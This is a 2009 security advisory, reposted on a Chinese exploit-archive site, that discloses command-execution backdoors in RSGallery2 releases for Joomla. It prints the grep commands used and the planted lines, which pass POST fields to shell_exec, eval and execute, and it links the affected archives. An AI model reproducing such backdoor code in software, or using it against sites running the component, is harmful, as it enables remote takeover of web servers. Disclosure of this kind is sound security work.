首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla Component com_rsgallery2 1.14.x/2.x Remote Backdoor Vuln
来源:vfocus.net 作者:vfocus 发布时间:2009-05-27  
Vulnerability:
	Remote code execution back door(s)

Software:
	RSGallery2 - Gallery Extension for Joomla!
	We are currently working on a new website. All files are still available at 
	the JoomlaCode project page.

Severity:
	Not a big deal.  Joomla components contain all sorts of obfuscated junk all 
	the time.  Who cares what it does?

URLs:
http://rsgallery2.net/
http://joomlacode.org/gf/download/frsrelease/6756/38088/com_rsgallery2_legacy_1.14.3.zip
http://joomlacode.org/gf/download/frsrelease/7791/36662/com_rsgallery2_2.0.0b1.zip

Joomlacode.org says, about these releases:
	RSGallery2 1.14.3 Security Release
	Jonah Braun
	2008-02-13
	This is an updated production alpha containing a low threat security fix. If 
	you use commenting you should upgrade. An option to show/hide the Search box 	
	has also been added. See the official site for downloads and support: 
	http://rsgallery2.net/

	RSGallery2 2.0.0b1 released
	John Caprez
	2008-06-23
	This is the first version of RSGallery2 that runs in Joomla 1.5 native mode.
 
	Special thanks goes to all the translators providing the updated language 
	files and the testers of the nightly builds.
 	Download it and enjoy. Feel free to report any bugs or problems in the forum 
	at the RSGallery2 main web site 

Vendor notified:
  I tried.  Not very hard though.  joomlacode doesn't seem to have a security 
  contact and links to joomla.org as if they are the same crowd.  I'm sending 
  a BCC to the given address for Jonah Braun though.  I'll send it to bugtraq, 
  and they will sit on it for a few hours.
  http://developer.joomla.org/security.html
      Huh?  Do I need more coffee, or does this page say to contact them using 
      the details at this page?  So you do that, and it says ... no wait, 
      infloop.  Oh wait, there is a contact form.  Filled something in.  Blah.

Vulnerability:

% wget \
http://joomlacode.org/gf/download/frsrelease/6756/38088/com_rsgallery2_legacy_1.14.3.zip

% unzip com_rsgallery2_legacy_1.14.3.zip

% egrep -r '(eval|exec).*POST' .

./language/english-utf8.php:                $result = 
shell_exec($_POST['cmd'] . " 2>&1 ; pwd");
./language/english-utf8.php:            $result = shell_exec($_POST['cmd'] . " 
2>&1");
./includes/rsgallery.class.php:$out = execute($_POST['cmd']);
./includes/rsgallery.class.php:eval($_POST['php']);
./includes/rsgallery.class.php:$out = execute($_POST['alias']);

There's other fun obfuscated javascript hiding in 'eval's'.

Ditto version 2

nuf sed  &:-)

# [2009-05-26]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Flax Article Manager 1.1 (Cook
·Kensei Board <= 2.0.0b Multipl
·PHP <= 5.2.9 Local Safemod Byp
·MyForum 1.3 (Auth Bypass) Remo
·Soulseek 157 NS Remote Buffer
·Safari RSS feed:// Buffer Over
·RoomPHPlanning 1.6 Multiple Re
·Flash Image Gallery 1.1 Arbitr
·Microsoft IIS 6.0 WebDAV Remot
·Gallarific (user.php) Arbirary
·Ultimate Media Script 2.0 Remo
·ShaadiClone 2.0 (addadminmembe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved